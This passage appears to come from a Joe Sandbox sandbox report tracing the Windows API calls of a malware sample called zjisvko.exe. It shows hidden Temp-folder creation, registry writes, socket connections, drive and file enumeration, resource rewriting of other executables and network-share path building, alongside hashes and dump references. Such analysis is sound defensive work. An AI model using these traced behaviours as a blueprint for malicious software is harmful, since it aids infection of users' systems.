                                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\), ref: 0040D7EC
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,0042A3B0), ref: 0040D7F8
                                                                                                                                                                                                                                                        • Part of subcall function 00414BF8: lstrcpyA.KERNEL32(00000001,00000002,776AC310,00000000,?,0040DB17,C:\Windows\system32\), ref: 00414C42
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,C:\Users\user\AppData\Local\Temp\,00000104,C:\Users\user\AppData\Local\Temp\,?,00000000,0040D80A), ref: 0040C02D
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,-00000006,?,00000000,0040D80A), ref: 0040C042
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: SetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000007,?,00000000,0040D80A), ref: 0040C058
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0042A3B0,?,00000000,0040D80A), ref: 0040C064
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,?,00000000,0040D80A), ref: 0040C071
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,-0000000C,?,00000000,0040D80A), ref: 0040C084
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: SetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000007,?,?,?,?,00000000,0040D80A), ref: 0040C09A
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,0042A3B0,?,?,?,?,00000000,0040D80A), ref: 0040C0A6
                                                                                                                                                                                                                                                        • Part of subcall function 0040C34F: GetCurrentProcess.KERNEL32(00000008,?,00000000), ref: 0040C37A
                                                                                                                                                                                                                                                        • Part of subcall function 0040C34F: OpenProcessToken.ADVAPI32(00000000), ref: 0040C381
                                                                                                                                                                                                                                                        • Part of subcall function 00415EAD: RegCreateKeyExA.KERNEL32(80000002,00000000,0040D819,00000000,C:\Users\user\AppData\Local\Temp\), ref: 00415EE9
                                                                                                                                                                                                                                                        • Part of subcall function 00415EAD: RegSetValueExA.KERNELBASE(0040D819,00000000,?,?,00000000,00000004,?,00000004), ref: 00415F12
                                                                                                                                                                                                                                                        • Part of subcall function 00415EAD: RegCloseKey.ADVAPI32(0040D819,?,?,00000000,00000004,?,00000004), ref: 00415F1B
                                                                                                                                                                                                                                                        • Part of subcall function 00415C5F: RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,00020019,00000000), ref: 00415CA3
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D832
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Filelstrcatlstrcpy$AttributesOpenProcesslstrlen$CloseCountCreateCurrentModuleNamePathTempTickTokenValue
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                      • API String ID: 312997863-464109022
                                                                                                                                                                                                                                                      • Opcode ID: 66a191b1396e23743340b3bf8f99a660aa270ad2aa5ebc0f0f600cc81104f07c
                                                                                                                                                                                                                                                      • Instruction ID: 34194b556595efbbea820b7bb6b9162989cf9261f3116618f2beeb079c5b6fcb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66a191b1396e23743340b3bf8f99a660aa270ad2aa5ebc0f0f600cc81104f07c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7F05E32606350ABC3117BA66C09B8A2AA49B92716F44403EFC09A1193CF7D845E87BE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountSleepTick
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2804873075-0
                                                                                                                                                                                                                                                      • Opcode ID: bcbde06f772920f99a7293fb31088fc1b5cf2bf604c785bf74fd9613630a949b
                                                                                                                                                                                                                                                      • Instruction ID: 8886811e3645dd5fd105ac6f2ed7bba4e59cd6dbffd4ffc0903a61d5b9bd62ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcbde06f772920f99a7293fb31088fc1b5cf2bf604c785bf74fd9613630a949b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE319E60904B91DDEB32A775880436BBBE4CB52304F48087FD581A72C2C67DA888DF6F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: inet_addr.WS2_32(00000000), ref: 004138C0
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: gethostbyname.WS2_32(?), ref: 004138CF
                                                                                                                                                                                                                                                      • htons.WS2_32(00000000), ref: 004149FC
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00414A11
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000004), ref: 00414A2C
                                                                                                                                                                                                                                                      • connect.WS2_32(00000000,00000002,00000010), ref: 00414A39
                                                                                                                                                                                                                                                      • select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 00414A66
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00414A6F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: closesocketconnectgethostbynamehtonsinet_addrioctlsocketselectsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 444889835-0
                                                                                                                                                                                                                                                      • Opcode ID: 4af9d196568c057da8a23582bd8704f8c3ef10ce5a943e317b25921d26bc4570
                                                                                                                                                                                                                                                      • Instruction ID: ded24326bd6f7ac8a89645a0ee9b908de195810948d6fb162e011f81d8ed15d6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4af9d196568c057da8a23582bd8704f8c3ef10ce5a943e317b25921d26bc4570
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44119171900318AFEB019FE0DC49BEEB77CFF08316F00416AFA11A6191DF749A548B98
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 00412744
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000126AE,00000000,00000000,00000000), ref: 00412758
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00412764
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041276C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041277B
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 0041278B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CountTick$CreateThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4024735586-0
                                                                                                                                                                                                                                                      • Opcode ID: 9afe8a1db201ebacc295fb3fbbfb31c18dff43c8a1ee2666920b63a3e9e06550
                                                                                                                                                                                                                                                      • Instruction ID: 30102fe69749e0e27f47770975eac562594a5c07fedf616aa80d11cd1fe59ab1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9afe8a1db201ebacc295fb3fbbfb31c18dff43c8a1ee2666920b63a3e9e06550
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0F02B70544389BFE3117B20DEC4CBB3B4CBB423847050436F4619229097885DA6977E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00408C76,00000080,00408C76,?,?), ref: 0040920A
                                                                                                                                                                                                                                                        • Part of subcall function 00413A97: GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,00000000), ref: 00409223
                                                                                                                                                                                                                                                      • BeginUpdateResourceA.KERNEL32(?,00000001), ref: 00409236
                                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(00000000,0000000E,004091E1,00000000), ref: 0040924B
                                                                                                                                                                                                                                                      • EndUpdateResourceW.KERNEL32(00000000,00000000), ref: 00409254
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040925B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Resource$AttributesFileLibraryUpdate$BeginEnumFreeLoadNames
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 980332788-0
                                                                                                                                                                                                                                                      • Opcode ID: c9332b95d5ea5032ba19c90525e84cbaac37ef8b39fb654ceb47db05e253ad1c
                                                                                                                                                                                                                                                      • Instruction ID: 7b0f776b340b65bee597074e77a709d4c982056f550d289e304040912e18300f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9332b95d5ea5032ba19c90525e84cbaac37ef8b39fb654ceb47db05e253ad1c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F05832204212BBD6322F60FC0DF5B7E65AF85B52F444679FA41B01A1CB758C229B6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLogicalDriveStringsA.KERNEL32(000003FF,?), ref: 004069C0
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 004069DA
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,:\System Volume Information), ref: 004069FC
                                                                                                                                                                                                                                                        • Part of subcall function 00413A97: GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                        • Part of subcall function 00413F8E: GetCurrentProcess.KERNEL32(00000008,00000000,?), ref: 00413FA3
                                                                                                                                                                                                                                                        • Part of subcall function 00413F8E: OpenProcessToken.ADVAPI32(00000000), ref: 00413FAA
                                                                                                                                                                                                                                                        • Part of subcall function 00413F8E: GetLastError.KERNEL32 ref: 00413FB4
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: Sleep.KERNEL32(00404909,76AEE800,00000000), ref: 00406726
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: wsprintfA.USER32 ref: 00406741
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: FindFirstFileA.KERNEL32(?,?), ref: 00406754
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: wsprintfA.USER32 ref: 00406798
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: FindNextFileA.KERNELBASE(00000000,00000010), ref: 00406820
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: FindClose.KERNEL32(00000000), ref: 00406830
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00406A33
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • :\System Volume Information, xrefs: 004069F0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFind$ProcessSleepwsprintf$AttributesCloseCurrentDriveErrorFirstLastLogicalNextOpenStringsTokenlstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: :\System Volume Information
                                                                                                                                                                                                                                                      • API String ID: 37162560-840427735
                                                                                                                                                                                                                                                      • Opcode ID: 1e547ddd46358945d6835e75b32b51ce569673e40d171a2a255a8dd4b7171486
                                                                                                                                                                                                                                                      • Instruction ID: 3a35d430a8b653277afed3024383a8c970a327806e4800319cf946ad7f90d972
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e547ddd46358945d6835e75b32b51ce569673e40d171a2a255a8dd4b7171486
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72012B719441695BDB20AB648C09FEA776C5B01301F8000A2A9C5B2181DA786BD68F59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,004111F6,000000FF,00000000,00000000,00000001,00000001,00000000), ref: 0041104A
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,004111F6,000000FF,00000000,00000000), ref: 00411064
                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000064,00000000,00000000), ref: 004110CB
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,004111F6), ref: 004110DB
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004110EF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$Heap$AllocateProcesslstrcatlstrcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 639236505-0
                                                                                                                                                                                                                                                      • Opcode ID: c560be55742c0ad1ca56dc250278d69ddf19ffe27204263b49b80b7badf15974
                                                                                                                                                                                                                                                      • Instruction ID: 00c259d247746a2f3f9f6cbc078631993a97f025e118c40de3abb8ee35525b35
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c560be55742c0ad1ca56dc250278d69ddf19ffe27204263b49b80b7badf15974
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB414C72C0021DBFDF219F94CD85DEFBBBDEB08314F5005AAF614A2190DA74AB948A64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,004112AF,00000000,00000000), ref: 00411176
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00411180
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,004112AF), ref: 004111B9
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004111E7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcmplstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                      • String ID: \\%s\
                                                                                                                                                                                                                                                      • API String ID: 3485474333-3797145132
                                                                                                                                                                                                                                                      • Opcode ID: 32064e61e1f49b5c9c4fb0e02d964cd57f1740343d7312fdcfdc3ce7af2f1b60
                                                                                                                                                                                                                                                      • Instruction ID: 84d4c3ec829869dbe6ef3b310b516fc96ec6a1f7541f08e11886f651c211f9e4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32064e61e1f49b5c9c4fb0e02d964cd57f1740343d7312fdcfdc3ce7af2f1b60
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA21C272A0425DBADF1097A4DC09FEE7BACBB09304F440036E704F7191E778959AC7A5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(76AE8A60,00000080,00000000,0044F765,75D36610,?,?,00407BCE,047E50D0,00408C5D,00408C5D,76AE8A60,00408C5D,?,00000000), ref: 00407B25
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(76AE8A60,40000000,00000002,00000000,00000002,00000080,00000000,?,00407BCE,047E50D0,00408C5D,00408C5D,76AE8A60,00408C5D,?,00000000), ref: 00407B36
